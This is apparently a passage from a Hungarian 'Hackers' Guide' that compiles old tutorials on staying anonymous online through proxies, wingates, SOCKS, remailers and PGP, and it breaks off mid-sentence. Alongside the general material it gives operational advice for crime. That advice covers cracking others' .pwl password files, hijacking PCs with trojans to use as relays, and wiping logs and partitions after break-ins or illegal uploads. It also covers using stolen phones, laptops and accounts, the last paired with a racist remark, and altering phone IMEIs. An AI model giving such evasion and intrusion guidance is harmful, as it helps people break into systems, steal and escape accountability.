- Ha az azonosítóval éppen fent vannak a neten, akkor ez mióta van... - Vajon van-e az illetőnek levele avagy sem... Persze ez ISP-k szerint változó... Van amelyek még a felhasználó lakcímét, telefonszámát stb. is kitálalják... Ezeket az információkat célszerű dolgokra is tudod használni...Ugye a legtöbb Instant Messanger (ICQ, AIM, YIM, MSIM) program megengedi, hogy bizonyos azonosító alatt lévő személyeket a tudtuk nélkül hozzáadhass a te "Kapcsolat listád"-hoz... Tehát megtudhatod, hogy az illető mikor online illetve offline, feltéve persze, hogy az illető mindíg futtatja Instant Messanger programját, amikor fent van a neten... Ha ismered az e-mail címét és ISP szerverén fut finger daemon, akkor megtudhatod, hogy valóban offline vagy csak nem indította el az Instant Messanger programját... IRC-nél még ajánlatos kiadni a státusz sorba a /mode TENICKED +x parancssort... Ennek segítségével ha valaki /whois TENICKED illetve /dns TENICKED parancsot bepötyögi, akkor nem tudja majd az IP/Host-odat megtudni... Persze nem minden IRC hálózatnál működik... És természetesen ha veled külön létesít DCC Chatet, akkor MS-DOS Parancssorba bepötyögött "Netstat" parancsal ki fogja azért nagy nehezen találni, hogy mi is az IP-d, Hostod...
Mi az a Proxy? Elősször is szeretném leszögezni, hogy még én is csak kezdő stádiumban vagyok és nagyképűség lenne azt mondani, hogy hacker lennék... mint azt teszik néhányan csak azért, mert a kezdők valami alap kérdést kérdeznek... és ők egyből hülyének nézik őket vagy lelámázzal, bár lehet, hogy csak azért teszik ezt, mert ők sem tudják... :) Naszóval maradjuk a témánál... Éppen múltkor beszélgettem valakivel IRC-en... egy underground csatornán találkozott velem, szüksége lett volna segítségre és én mint mindig a kis tudásommal megpróbáltam segíteni... Ő kérdezte meg a társalgás közben, hogy mi is az a Proxy? Lehet, hogy egyesek tudják, de van aki még hallani sem hallott róla nagyon... Szóval a proxy szervereket elsődlegesen is azért találták ki, hogy a felhasználók internet sebességét az ISP szervere és a felhasználó gépe között felgyorsítsák... Amikor te a böngésződben szörfözöl és szeretnél megtekinteni ugye egy honlapod... elősször is bepötyögöd az oldal URL-jét a címsorba és nyomsz egy hatalmas entert... naszóval a te HTTP kérelmed nem az URL alatt lévő szerverre érkezik meg, hanem a te ISP-d proxy szerverére, ami nagyvalószínűséggel az internetszolgáltató központjában van (általában Budapest) A HTTP kérelmet a proxy szerver megvizsgálja (proxy server pl. Microsoft Proxy Server 2.0, Squid/Linux)... vagyis, hogy megtekintette-e valaki az utóbbi időben a bizonyos oldalt... ha van egy másolat a szerveren az oldalról, akkor leellenőrzi a szerver, hogy a mérete és a fájl megegyezik-e vagy le kell-e tölteni... Ha megegyezik, akkor máris küldi a gépedre, ha nem, akkor elősször letölti a proxy szerverre az oldalt és onnan a te gépedre továbbítja... Ezáltal ugyebár névtelenséget biztosítanak neked a proxyk... vagyis a webszerverhez nem te juttatod el a kérelmet a letöltéssel kapcsolatban, hanem a szerver... és a proxy szerver IP-jét illetve adatait fogják látni és nem a tiedet... Persze nem akarom elvenni a kedvet, de ha nagy disznóságot csinálsz, akkor a proxy szerveren keresik vissza az infót :))) a .log fájlokból... A legtöbb hazai internetszolgáltatónak van proxy szervere, sőt ajánlják is. Ha ezzel kapcsolatban bővebb információra lenne szükséged, akkor kérdezd meg az internetszolgáltatód
162
Hackers’ Guide
supportját :), ahogy azt a WBT csapat is tette :))) Persze a proxykkal kapcsolatban fenntartások is felmerülhetnek egyes ISP-knél... - Legtöbb internetszolgáltató proxy szervere nem működik egyenletesen, azaz nincsenek normálisan confizva. - A weboldalak üzemeltetői a proxy alapján megtudják nézni, hogy melyik internetszolgáltató felhasználója voltál és az ISP-n keresztül ugyancsak visszatudnak utánad nyomozni. Persze vannak publikus proxy szerverek is... Ha ilyenek érdekelnek, akkor tekintsd meg http://www.cyberarmy.com/list URL alatt található publikus proxyszerverek listáját...
Mi az a wingate szerver? Wingate-ek segítségével névtelen tudsz maradni az interneten. Ha találsz egy wingate szervert amire fel tudsz kapcsolódni, akkor azon keresztül tudsz másokkal kommunikálni az interneten keresztül pl. amikor IRC-lesz valakivel... Nem a te IP számodat, HOST nevedet fogják látni, hanem a wingate szerverét... azt meg nyugodtan pingelhetik :) Tehát a névtelenség mellett egy bizonyos biztonságot is nyújt neked... A wingate-ek egyik rendkívüli tulajdonságuk, hogy nagyon egyszerűek... Hogy értem ezt? Úgy hogy szinte minden géphez (még a tiedhez is) egyszerűen lehet kapcsolódni az 1080-as porton keresztül... miután kapcsolódtunk, be kell gépelni a cél-ip-címet_vagy_host-nevet (nem találomra ;)) ezek után a szerver visszaigazol... Természetesen a szerver rendszergazdája megtudja változtatni szükség esetén a wingate portot... A wingatet akkor is tudod hasznosítani ha hostodat banoltak mondjuk "nick flood" miatt a csatornáról és nem engednek fel... Akkor irány egy wingate szerver... és azon keresztül a kedvenc csati :) Persze itt szeretném felhívni a figyelmet arra is, hogy néhány IRC hálózat olyan botokat használ, ami kidobja a wingate-en keresztül csatlakozó felhasználókat... Tehát a bot megnézi, hogy a nick milyen host alatt kapcsolódott, majd megpróbál erre a hostra az 1080-as porton keresztül kapcsolódni... és ha ez sikerül neki akkor sajnos ugy repülsz az IRC hálóról, mint a Concorde repülők... Van ez így ;)
Kriptográfia? Titkosítás? Mindenki valamilyen módon (legyen az egyszerű /a'la Hotmail/ vagy nehéz) eltudja valamilyen módon olvasni személyes leveleidet... Nyugodtan nem társologhatsz emailben vagy telefonon keresztül, de még IRC hálózaton illetve Instant Messangeren keresztül sem, amikor tudod, hogy a nagy testvér figyel téged... Ezért találták ki valamikor a '90-es évek elején Philip Zimmerman és társai a PGP titkosítási rendszert... Amely mára a legelterjedtebb és legismertebb "strong cryptosystem"-é vált... Elméletileg a PGP rendszert nem lehet külföldre exportálni... ezt a PGP munkatársai úgy oldották meg, hogy kinyomtatták könyv formájában a forrást és így vitték ki az USA területén kívülre... Persze ez ellen a különböző hivatalok (NSA, CIA, FBI) véresen tiltakoztak... A PGP kriptórendszer legfőbb tulajdonságai: - Az USA besorolása szerint "strong cryptosystem", azaz erős kriptográfiai rendszerek - Kulcsok segítségével történik a titkosított kommunikáció az elektronikus levelezésben
163
Hackers’ Guide
- Digitális aláírás készítésére alkalmas - Freeware, azaz szabadon terjeszthető... Forrása bárki számára hozzáférhető... - Lemezünk felületét tökéletesen visszaállíthatatlanul törölhetjük a PGP rendszer segítségével - Merevlemezünkön kijelölt helyen a PGP létrehoz egy PGP Disk-et, ahol minden fájl titkosítva van... A PGP-vel titkosított fájlok (főleg megfelelő kód és hosszúság esetén) csak egyes titkosszolgálatok gigantikus szuperszámítógépei tudják feltörni... és azok is csak hosszú idő után... Ajánlatos továbbá, hogyha rávetemedsz a PGP-re, akkor a kulcsod generálásánál ügyelj a következőkre: - Kulcsod hosszúsága lehetőleg 4096bites legyen - Kódod hosszúsága 20-30 karakter között legyen... és felváltva legyenek benne A-Zig, 0-9-ig karakterek, illetve egyéb (#,&,@,{,},;,$,ß,÷,×,¤ stb.) karakterek, hogy minél nehezebb legyen megtörni a titkosított dokumentumot... lehetőleg csak a tartalom elévülése után :)))
Cookiek Tudni akarod, hogy a weboldalak honnan szereznek veled kapcsolatban információkat, hogyan emlékeznek a becenevedre? Honnan tudják a kódodat, e-mail címedet, azt, hogy pl. egy webáruházban mit raktál be a kosárba legutoljára illetve, hogy mit vásároltál? Minderre és még számtalan kérdésre a válasz egy szó: cookiek... azaz magyarra fordítva sütik... Szóval ezek a cookiek kis fájlok, amelyek a te gépeden találhatóak, és a weboldalak a te merevlemezedről hívják meg ezeket... Ezekben rengeteg információ van veled kapcsolatban... Ezek a sütik minden op.rendszerben máshol helyezkednek el... - Windows'9x op.rendszerek esetén a "\Windows\cookies" könyvtárban... - Unix op.rendszerek esetén viszont a "/home/your-login", "/usr/your-login" vagy "/usr/local/your-login" könyvtárakban... Néhány ötlet és ajánlás a cookiekkal kapcsolatban: - Ajálatos a böngésződet úgy beállítani, hogy minden alkalommal kérdezzen rá a cookiek elfogadására... - Ha te egy nyilvános PC-ről internetezel (pl. Cyberkávézók) figyelj oda, hogy egyetlen egy cookie se maradjon a gépen, illetve ha előtted ültek, akkor nézz körül... Hátha valamelyik balfék fent hagyott néhányat ;))) - Ha sikerül trojai programmal bejutnod egy gépre, akkor ajánlatos szétnézned a cookiek körül... hátha találsz valami számodra is inycsiklandozót... :) Egyébként a cookiek az alábbi képpen épülnek fel: - NAME=VALUE; expires=DATE; path=PATH; domain=DOMAIN_NAME; secure VALUE DATE PATH és DOMAIN_NAME secure
164
- a cookie neve - a cookie ekkor jár le - melyik URL férhet hozzá a cookiehoz - a cookie-t biztonságos csatornában kell küldeni
Hackers’ Guide
History, bookmark, Cache Benyomok még néhány fogalmat, mint a tankönyvekben, hogy abszolút-e érthetetlen legyen az egész :). History - Megőrzi (alap esetben 30 napig) azokat az URL-eket, amelyeken jártunk. . Bookmark - A bookmark a gyakran látogatott oldalak URL-jét őrzi meg. Ha olyan oldalhoz tettünk bookmark-ot (Ctrl+D) amely login nevet és jelszót igényel, akkor a cache tartalmát vizsgálva minimum a felhasználónév megvan. Cache - A cache a böngészés felgyorsítására szolgál. Amikor letöltünk egy oldalt, akkor a böngésző az egész oldalt a hozzátartozó képekkel együtt tárolja a cache-ben (Windows operációs rendszer esetén a C:\Windows\Temporary Internet Files könyvtárban vannak ezek a fájok). Ha ugyanazt az oldalt kívánjuk újra megnézni, akkor a böngésző az oldalt a cache-ből veszi elő, nem pedig a távoli szerverről. Ha a reload gombra kattintunk (vagy F5 gomb), akkor a böngésző megnézi, hogy a távoli szerveren lévő példány frissebb-e, mint a helyi gépen tárolt, és a legutolsó változatot tölti le, olyan, mint egy házi proxy. A legtöbb böngésző a form-okba írt adatokat is eltárolja.
E-mail és Anonymus remailerek? Szóval egy újabb pont, rész vagy akárminek is hívjuk, aminek segítségével információt szerezhetnek rólunk... Ha küldesz valakinek egy e-mail, akkor egy csomó infót eltárol rólad a levél... Íme egy levél "hátsó" tartalma, amit éppen egy levéllistára küldtek és így érkezett meg hozzám: Return-Path: <sentto-1857759-326-965320298nestan=freemail.hu@returns.onelist.com> Delivered-To: [email protected] Received: (qmail 99176 invoked from network); 3 Aug 2000 18:33:50 +0200 Received: from ho.egroups.com (208.50.99.200) by fm7.freemail.hu with SMTP; 3 Aug 2000 18:33:45 +0200 X-eGroups-Return: sentto-1857759-326-965320298nestan=freemail.hu@returns.onelist.com Received: from [10.1.10.36] by ho.egroups.com with NNFMP; 03 Aug 2000 16:31:47 -0000 Received: (qmail 7265 invoked from network); 3 Aug 2000 16:31:35 -0000 Received: from unknown (10.1.10.26) by m2.onelist.org with QMQP; 3 Aug 2000 16:31:35 -0000 Received: from unknown (HELO fm3.freemail.hu) (194.38.105.13) by mta1 with SMTP; 3 Aug 2000 16:31:25 -0000 Received: (qmail 78246 invoked by uid 425920); 3 Aug 2000 18:31:20 +0200 To: [email protected] Message-ID: X-Originating-IP: [212.40.96.15] From: Cagliostro MIME-Version: 1.0 165
Hackers’ Guide
Mailing-List: list [email protected]; contact [email protected] Delivered-To: mailing list [email protected] Precedence: bulk List-Unsubscribe: <mailto:[email protected]> Date: Thu, 3 Aug 2000 18:31:19 +0200 (CEST) Reply-To: [email protected] Subject: [foldalatti] All in 1 Maker for All Content-Type: multipart/mixed; boundary="0-1804289383-965320279=:78235" Ugye hogy mennyi információt rejt egy egyszerű levél az IP-től kezdve a levelezőprogram típusáig... Tehát nem elég, hogy egy ingyenes e-mail szolgáltatónál regisztrálunk magunknak postafiókot, még mást is kell tennünk, hogy az anonimitást tényleg élvezhessük... Ehhez jók az Anonymous remailerek... Ezeknek a listáját megtalálod a http://www.theargon.com URL cím alatt. Most röviden azért elmagyarázom, hogy mikép tudod használni ezeket... persze csak a rend kedvéért... Tehát elősször is menj el a http://anon.ISP.ee -re és regisztrálj be magadnak egy ingyenes azonosítót... Ha te regisztráltad magad, akkor küldj egy e-mailt a [email protected] -re az alábbi tartalommal: user: felhasznalo-neved pass: te-jelszavad realaddr: a-te-valodi-email-cimed realsubj: a-kuldendo-leveled-temaja És ide kerül a levél tartalma... yó mi?! Szóval itt egy példa, így kell: user: nestan pass: jolennehatudnad realaddr: [email protected] realsubj: Éljen a névtelenség mindörökké! Üdv kedves barátom!! Ez egy névtelen e-mail üzenet. Legjobb kívánsággal: I'am the God
Egy kis idő után fogsz egy visszaigazoló e-mail kapni az anon.isp.ee-től, hogy leveled megérkezett... Ha ezt a levelet visszaküldöd, akkor a rendszer elküldi a kijelölt e-mail címre a levelet... Vannak persze olyan anonymous remailerek, amelyek webes felületen is elérhetőek... pl. az alábbi URL alatt: http://www.replay.com/remailer/anon.html A másik az e-mail relaying... Szóval a rosszul bekonfigurált mailserverek megengedik (a'la sulinet) ezt... Például a [email protected]@sulineve.sulinet.hu e-mail címre küldött levelet (ha a mailserver rosszul van beállítva) elküldi nekem... és így a headerben a suli infói lesznek :)
166
Hackers’ Guide
.chk fájlok, mi van velük? Szóval talán már biztos, hogy találkoztál .chk kiterjesztésű fájlokkal... Tudod, amiket a Windows gyárt nagyiparban a lefagyások után ;) Szóval ezekről beszélek... Hogy mi közül van ezeknek a névtelenséghez? Nézd csak meg a fájlok tartalmát... Úgye milyen meglepő, hogy mennyi információt tárolnak rólad??? Ajánlatos tehát minden alkalommal a C:\ gyökérből törölni az összes .chk fájlt!
.pwl fálok? Igen... Ilyenek is vannak... és hogy a pwl kiterjesztés valójában mit takar? Az összes windows azonosítót/jelszót... Nézd csak meg... Ott van a C:\Windows könyvtárban... Érdemes megnézni közelebbről is őket... A fájl neve általában a felhasznalonev.pwl felállásban található meg... Nem kell ezekután semmit sem tenned, csak letölteni egy PWL fájl törő programot (pl. a Cain 1.51, de találsz más progikat is a http://ww.password-crackers.com URL alatt) és ráereszteni mondjuk Brute Force a kódtöröt... Milyen jó, amikor más dolgai között kutatgatunk :)
Hogyan helyezzünk fel nem kívánatos dolgokat az internetre úgy, hogy identünk ne derüljön ki? Ehhez néhány perverz ötlet jutott az eszembe... Az egyik a cyberkávézók... Ugyebár itt a forgalom rettenetes és nem hiszem, hogy egy hét múlva emlékezni fognak az arcodra... és ugyanez mehet a könyvtárakban is... A Sulinetes termeknél vigyáznék... mert ilyenek miatt nagy csetepatét tudnak ám rendezni... A másik, hogy ahol hackelt oldalakat vagy illegális dolgokat fogsz feltölteni, oda ne járj vissza! Ez fontos! Miután feltöltötted a dolgokat fdiskel kedvesen töröld a partíciókat :) Ennél gyorsabb módszer nincsen a tisztogatásra... Aztán még egy ilyen bizarr ötlet az, hogy lopatunk a "színes kisebbséggel" frissen mobilt... megugye egy laptopot... összekötjük a kettőt aztán valami lopott accountal irány a net... :)
Néhány link a végére... http://www.theargon.com http://www.pgpi.com http://www.cyberarmy.com http://2waymedia.hypermart.net/hh/browsers/index.htm http://www.anonymizer.com http://www.hacker.co.il http://www.hacker.co.za http://neworder.box.sk
Összegzés meg miminden Szóval ha voltam olyan állat, hogy ennyit írjak, akkor úgy illik, hogy valamivel zárjam soraimat... Appendixnek a végére csak annyit, hogy hülyeség manapság egy olyan
167
Hackers’ Guide
helyen névtelenségről beszélni, ahol még azt is .logolják szinte, hogy mikor szarsz ;) ... de egyvalamire jó ez az egész... Megmutatja számodra, hogy csak megfelelő odafigyeléssel tudsz felismerhetetlen maradni és a hackerkedés sem abból áll, hogy egy password fájlra ráereszted a John The Rippert vagy a L0pthCracket... Ennyi... Vége... Még utoljára elmondom... ha valakinek valami nem volt világos, akkor kérem írjon, mert múltkor is egy csomóan rinyáztak a mobilos cikk miatt... Csak azt nem tudom, hogy mit nem lehet rajta érteni?! Na mind1... Szóval ha próbléma van, akkor mélázzatok NEKEM!!!
Nestan [FCF] mailto: [email protected] · Külön köszönet a segítségért az alábbiaknak: RSC, Formater
************************************************************************************************
Hogyan maradjunk ismeretlenek? A hack-elés első és legfontosabb követelménye: NE BUKJ LE! Éppezért nagyon vigyázz és csak olyan dologba menj bele, amit TELJESEN biztonságosnak érzel! Ismerd a képpességeidet és mindíg csak annak megfelelően cselekedj! Mindennél jobban figyelj oda arra, hogy a ténykedésed ne legyen benne a log-ban/el legyen bujtatva az IP-címed. Ebben a kis tutorialban ezt a témát fejtem ki bővebben. Szóval kezdjük is azzal, hogy mi is az a socks/proxy/wingate/spoof-firewall. Ezek olyan server-ek, amik kapcsolódáskor a géped és a kapcsolódni kívánt gép közé ékelődnek és ezeken keresztül továbbítódnak az adatok úgy hogy a firewall kiszűri belőle a rosszindulatú csomagokat (a "házi" firewall program is képes erre softwaresen, de sokkal hatástalanabbul felügyeli az adatkommunikációt, bár a firewall servereken is ilyen fut komolyabb kivitelben), így azokra már nem kell ügyelned. A másik fontos tulajdonsága hogy a másik géphez kapcsolódva nem a te IP-d lesz látható hanem a firewall-é és ez a leglényegesebb, mert az Internet szolgáltatód egyből kiadja az adott időben használt IP-dből a telefonszámod/címed és már jönnek is a fakabátok (ezért kell valami telefonszám visszakereshetetlenítő cuccot(anti- tracert) használni. Bár ez már "kicsit" bonyolultabb dolog :), akik elkobozzák a géped és a csupa legális szoftvereid, a pornócédétől kezdve a hacker cuccos CD-n át egészen a felírt winfos2000-ig és még ezekért is jókora büntetést kapsz.
168
Hackers’ Guide
Legfontosabb különbség lehet firewall és firewall között hogy lehet anonymus vagy publikus. Ez annyit jelent, hogy a publikus nem használható hack-elésre, mert ha megmondják nekik hogy rajtuk keresztül törés történt, akkor secpec alatt megmonják az igazi IP-t. Az ilyen publikus firewall-okat általában cache-elés céljából hozzák létre. Az Internetes cache működése: amikor egy cache serverhez kapcsolódva akarsz adatot letölteni, a server először saját merevlemezén (vagy vele hálózatba kötött más cache serverek merevlemezén) próbálja megtalálni a kívánt adatot, ha ott megtalálja, akkor közvetlenül a cache-serverről nagyobb sebességgel letöltheted. Ha nincs meg, akkor letölti arról a helyről amit megadtál és elmenti a vinyójára, így legközelebb már benne lesz a cache-be (de egy idő után törlődik). Hátránya ebből következőleg hogy nem biztos hogy a legfrissebb infót kapod meg. A cacheserverekben akár a kért információk 30%-a is megtalálható. Az anonymus firewallok már megfelelő védelmet nyújtanak, de komolyabb tettek esetén azok sem védhetnek meg. Pl.: ha valami nagy dolgot hajtottál végre akkor onnan is megszerzik az IP-d. Ezért lehet komoly betöréseknél hasznos több firewall egymás mögé bújtatása, összefűzése. Ezt egyszerűen megteheted: miután csatlakoztál a firewall serverhez, újból csatlakozol egy másikhoz. Ennek többszöri végrehajtásával ellehetetlenítheted a visszakeresést. A legtöbb tűzfalat csak egy szűk kör hasznáhatja (Jelszóval szokták levédeni/vagy kitiltanak belőle IP-ket. Az olyanok amiket a nagyközönség is használhat általában tiszavirág életűek ezért a firewall listák naponta változnak.). Sajnos a hírhedtebb tűzfalak IP-jét sok server egyszer és mindenkorra kitilja magából elővigyázatosságból... Többféle firewall server létezik: 1. Socks: IRC-s tűzfalnak szokták használni. Két típusa van: a socks4-es és a socks5-ös. Általában a 1080-as porton mennek. Hátrányuk lehet egyes ismeretek hiánya (OP :)) és (mint a legtöbb tűzfalnak) a lassúság. Természetesen csak arra jó hogy ne szívassanak IRC-ről. Ha nem tudsz jó socks-firewall-t akkor itt egy oldal, ahonnan egy kis klienset letöltve IRC-zhetsz anonymus: www.missingu.com 2. Proxy: általában HTTP/FTP-hez szokták használni (ezek között vannak a cacheserverek). A 8080/3128-as portokon szoktak kapcsolódni. 3. WinGate: ezt tulajdonképpen minden szolgáltatáshoz lehet használni (FTP/HTTP/TELNET/IRC/stb...). Default portjuk a telnet port (23), de egyre gyakoribbak a 1080-as porton üzemelők is. 4. Spoof: a lényege hogy valaki más nevében (IP-címében) cselekszel. Ez már a haladóbb technikák közé tartozik. Abból áll, hogy pl egy trojan segítségével az uralmad alá kerítesz egy PC-t és azt használod firewallként, annak az IP-címét használod törésnél. Ez már kicsit brutális technika... :)) Spoof-olás után mindíg takarítsd el a nyomokat (trojan, stb.) Elvileg mindegyik firewall összefűzhető telnet segítségével. Ha bármi törvénybe ütközőt teszel a neten akkor jobb ha elbújtatod az IP-d. Ja, és SEHOL ne hagyj olyan nyomot amin keresztül eljuthatnak hozzád. Pl.: SOHA ne adj meg valódi nevet egy software-edben sem, ne regisztrálj sehol valós névvel, címmel, adattal. Mert baromi egyszerűen (akár egy JavaScript-el megtuthatnak mindent rólad... Itt egy jó cím kiindulásnak még az anonymizáláshoz: www.webprovider.com Ha már feltörted a célpontod, akkor már nem is nagyon van szükséged IP-bújtatásra (de ki tudja a kezdeteknél, hogy sikerrel jár-e?!... :)),
169
Hackers’ Guide
egyszerűen eltünteted a logfile- okból (figyelj hogy az összesből!) a bűvészkedéseid nyomát (de ezesetben később értesítsd a rencergazdit a bejutásod módjáról (ez így lojális), miután végrehajtottad a server-en azt amit terveztél) vagy szedd ki/írd át :)) belőle az IP-t! Itt jegyezném meg hogy nagyon vigyázz a backdoor-okkal mer nem olyan nehéz őket megtalálni és sokan buktak már le backdoor használat közben! Vigyázz az e-mail-el mert manapság az is veszélyes (webes felületről levelezz+titkosíccs ha nagy dologra készülsz)! Egyébként a lakásodban ne tarts semmi olyat nagy akciók után ami perdöntő lehet (értem ezalatt a dokumentumokat és a programokat a vinyón és a lemezeken)! Itt egy útvonal, amin ábrázolva van, hogy hogyan juthatnak el hozzád (alatta pedig hogy hogyan szakíthatod meg a láncszemet) IP-d -> Internet hozzáférésed -> telefonszámod -> lakcímed Firewall/ Lopott/hamis néven Használj valami Hack-elj $uliból Log-koz- regisztrált elérés anti-tracert/ (ez kész lebukás :) metikázás (vigyázz mert így átírt IMEI-jű Internet kávézóból is vissza tudják mobiltelefont! Ellenségedtől... nyomozni a számod!) * vagy mitomén :))) (*: de háromszögeléssel ezt is meg lehet találni de persze csak real time-ban és az esélye szinte 0) A legjobb ha mind az összes láncszemet kiiktatod ;) de persze erre (szinte) soha nincs szükség. De ha már a NASA-t töröd :) itt egy kis védelmi rencer: összefűzött anonymus wingate-ek egy spoof-olt netezőn keresztül vannak "bekötve", miközben lopott eléréssel egy átírt IMEI-jű mobilon anti-tracert használva ülsz egy mozgó kocsiban a laptop-oddal... Így talán nincs szükség a log-bűvészkedésre... :)))))) Nah, mára ennyi volna, de lehet hogy később folytatom... A dokumentumot csak az engedélyemmel publikálhatjátok máshol! ASCIImo
************************************************************************************************
Egyedi azonosító? Alig volt idô arra, hogy megjelenjenek a felháborodott újságírók cikkei az új Intel processzorokba égetett egyedi azonosítószámok kapcsán, máris felfedezésre került a Microsoft által programhibának keresztelt másik egyedi azonosító is, amely a Win98-as DOC fileokba épül be. Figyelnek minket a neten, tudják mikor és hol járunk - ha kellôképpen régi a konfigurációnk ahhoz, hogy a hatalmas Microsoft még ne tudja minden lépésünket követni, akkor is ott az IP címünk, amely alapján bármikor visszakereshetik tetteinket. Annak idején az iskolában úgy tanultuk, hogy az IP cím egy egyedi azonosító, mely alapján egyértelműen kideríthetô, hogy ki az adott felhasználó, s ez így is van, ám ha az ember kellôképpen megszelidíti, az IP-nek is könnyen nyoma veszhet a rengetegben. Böngészés közben akarva akaratlanul is kénytelenek vagyunk az adott weboldalnak IP címünket megadni - hiszen enélkül lehetetlen lenne a kommunikáció -, ám ha rá
17 0
Hackers’ Guide
tudunk bírni valakit, hogy álljon a közénk és a kiszolgáló közé, rejtve maradhat az adott oldal számára a mi címünk. Köztes félnek alkalmas pl. a http://www.anonymizer.com/ oldal. Anonymous E-MAIL serverek százával találhatóak a hálózaton - segítségükkel IP címet nem tartalmazó leveleket tudunk küldeni (s ha szerencsénk van, akkor az EMAIL küldô server sem loggol), habár sok helyen megkötés van a napi levélforgalmunkat illetôen. Talán a legfontosabbnak IRC-zés közben tűnik az eredeti IP-nk elrejtése, hiszen a legtöbb negatív élményt itt szerezheti az ember, pl. ha belekerül egy netharc közepébe (vagy netán szembetalálkozik az ôrült netes gyilkossal, aki IRC-n gyűjti leendô áldozatait). A legegyszerübb módja az anonimitásnak, ha ellátogatunk a http://www.missingU.com címre, ahol egy JAVA-s IRC programmal csatlakozhatunk az IRCNetre, @missingU.com host-al. Ennél kellemesebb megoldás, ha egy nyilvános proxy-t használunk, hiszen így a megszokott IRC kliensünkel csatlakozhatunk a hálóhoz, csak a hostunk lesz a megszokottól eltérô. Szabadon elérhetô proxy serverek magyarországon is vannak - itt közölni ôket azonban értelmetlen lenne, hiszen a túlterhelés miatt lassúak lennének, és az IRC serverek sem engednék be a felhasználókat az azonos (proxy-s) hostok miatt. Nem csak mi tudunk elbújni mások mögé, ha óvatlanok vagyunk, mások is pajzsnak használhatnak minket, ha a 1080-as portunk nyitva van. Eképpen lehetséges akár az is, hogy egy személy 10-20 különbözô szolgáltatónál lévô dialup-os hostal legyen fenn egyszerre IRC-n, ami megkérdôjelezheti az IP cím egyedi azonosító mivoltát. A végsô kérdés igazán kézenfekvô: megtanulhatunk anonimitásba burkolózni mások mögé bújva, s üzenetközvetítôket használva - könnyedén. De mi van akkor, ha ôk éppen azért vállalják ezt a szerepet, hogy lehallgassanak minket? Video
************************************************************************************************
Proxy I.
1. Mi az a proxy szerver? 2. Milyen egy proxy szerver? 3. Hogy talaljunk egyet? 4. Hogyan konfigurajuk a bongeszobe? 1. Mi az a proxy szerver? A proxy szerverek segitsegevel konnyen es gyorsan elrejthetjuk az IP-ket.
17 1
Hackers’ Guide
2. Milyen egy proxy szerver? A proxy szerver egy tuzfal szerver. Ehhez a szerverhez mas szamitogepek csatlakoznak es ezeken keresztul interneteznek. Ha bongeszel akkor ez altalaban igy nez ki: Te geped -> ISP (szolgaltato) -> A web lap (Igy a sajat IP-det latjak) Ha proxy-t hasznalsz: Te geped -> ISP -> Proxy -> A web lap (Igy pedig a proxy IP-jet latjak) A proxy elrejti a sajat IP-det. 3. Hogyan talaljunk egyet? Kersz, kapsz :). Kulfoldi es hazai lapokon is szoktak lenni proxy listak, ezek nagy resze nem mukodik, de azert van kozottuk hasznalhato is. Altalaban a szolgaltatonak is van proxy szervere. Na de ha mar nincs mit tenni akkor olyan hostot vagy IP-t keresel amelyiknek szabad a 8080 vagy a 3128-ik portja. 4. Hogyan konfigurajuk a bongeszobe? Internet Explorerben: View (nezet) -> Network (Internet beallitasok) Proxy tab. Ne hasznalj Netscape-et :) De ott is valahol a Properties-ben vagz Options-ban van. Zucco
************************************************************************************************
Proxy II. A proxy szót olyan értelemben fogom használni, mint átjárót két számítógép között. Tegyük fel, hogy van két számítógép, amelyek kommunikálnak egymással, A és B. Példánkban A kapcsolatot létesít B-vel, és adatot cserélnek: A ========== B Mindketten látják egymás IP címeit, és egyenesen oda küldik az adatokat. Ez a fajta kommunikáció a leggyakoribb az Interneten. Elképzelheto azonban olyan eset, amikor A nem tudja (vagy nem akarja) egyenesen B-nek küldeni az adatokat, hanem egy harmadik felet kér meg a közvetítésre, vagyis C-t: A ======= C ======= B
17 2
Hackers’ Guide
Ekkor A is és B is közvetlenül C-vel kommunikál, azonban C-nek mindössze annyi a szerepe, hogy az A-tól jövo adatokat továbbítsa B felé, mintha o küldte volna oket, és fordítva. Ebben az esetben C-t tekinthetjük proxynak. A proxy azért érdekes számunkra, mert ha A kezdeményezi a kapcsolatot B felé, akkor B nem fogja tudni A valódi IP címét, hanem úgy fogja érzékelni a csatlakozást, mintha C kezdeményezte volna (azonban a valóságban mögötte áll A). Többféle típusú proxy létezik (protokoll szerint megkülönböztetve). A telnetes kapcsolatok használatához (pl. email/fakemail küldése, IRC, accountra való bejelentkezés stb) gyakran használatos, egyszerusége miatt a WinGate. Ez általában a 23-as porton szokott lenni, és onnan lehet felismerni, hogy ha telnettel kapcsolódunk hozzá, akkor "WinGate>" prompttal köszön. Lássunk egy példát! Tegyük fel, hogy az ftp.rulez.org címre akarunk csatlakozni a 6667-es porton (ez általában az IRC portja), de nem akarjuk, hogy lássák az IP címünket. Közbeiktatunk egy WinGate proxyt, amelynek a címe például az, hogy proxy.wingate.com. Indítsuk el a telnetet, és csatlakozzunk a proxy.wingate.com -hoz (vagyis a wingate-hez)! >>MS Windows 9x<< Start>Run, írjuk be: telnet proxy.wingate.com A megjeleno "WinGate>" szöveg után írjuk be: ftp.rulez.org 6667 (és üssünk entert): WinGate> ftp.rulez.org 6667 Connecting... Connected to host ftp.rulez.org on port 6667 és készen is vagyunk, megkezdhetjük a telnet-kapcsolatot, ugyanúgy, mintha nem használnánk proxyt. Fejlettebb szolgáltatást nyújt a SOCKS, kétféle verzió terjedt el széles körben, a 4-es és az 5-ös. Ezt nehézkes telnettel használni (a Win9x beépített telnetjével nem is lehet), de a legelterjedtebb IRC-kliensek (mIRC, Pirch98 stb) támogatják a használatát. A mIRC-ben (5.6-os verzió van meg nekem) nyomjunk Alt-O -t, és a Connect menüpont alatti Firewall menüpontot válasszuk ki. Jelöljük be az "Use SOCKS firewall" négyzetet, és válasszuk ki, hogy milyen verziójú szervert használunk. A "Hostname" mezobe írjuk a SOCKS proxy IP-címét vagy hostnevét, alá a loginnevet és a jelszót (ha kell), majd a portot (általában a SOCKS az 1080-as porton üzemel). "Initiate DCCs through firewall" - kapcsoljuk be, majd nyomjunk OK-t. Ezentúl minden alkalommal, amikor ircelni akarunk, a mIRC megpróbálja majd a csatlakozást a SOCKS-on keresztül létrehozni. Ha nem sikerül, hibaüzenetet kapunk (ekkor esetleg másik SOCKS-ra kell váltanunk). Pirch98-ban pedig az IRC menübol válasszuk a "Proxy setup" menüpontot, majd a megjeleno ablakba írjuk be a szükséges információkat (a Pirch csak a 4-es proxyt támogatja). Nyomjunk OK-t, és a továbbiakban csatlakozáskor a SOCKS-on keresztül kapcsolódunk. Proxyk kereséséhez Win9x alatt a Proxy Hunter nevezetu programot ajánlom, mert gyors, sokféle proxyt ismer, és sok szolgáltatása van. Errol a címrol lehet letölteni a legújabb 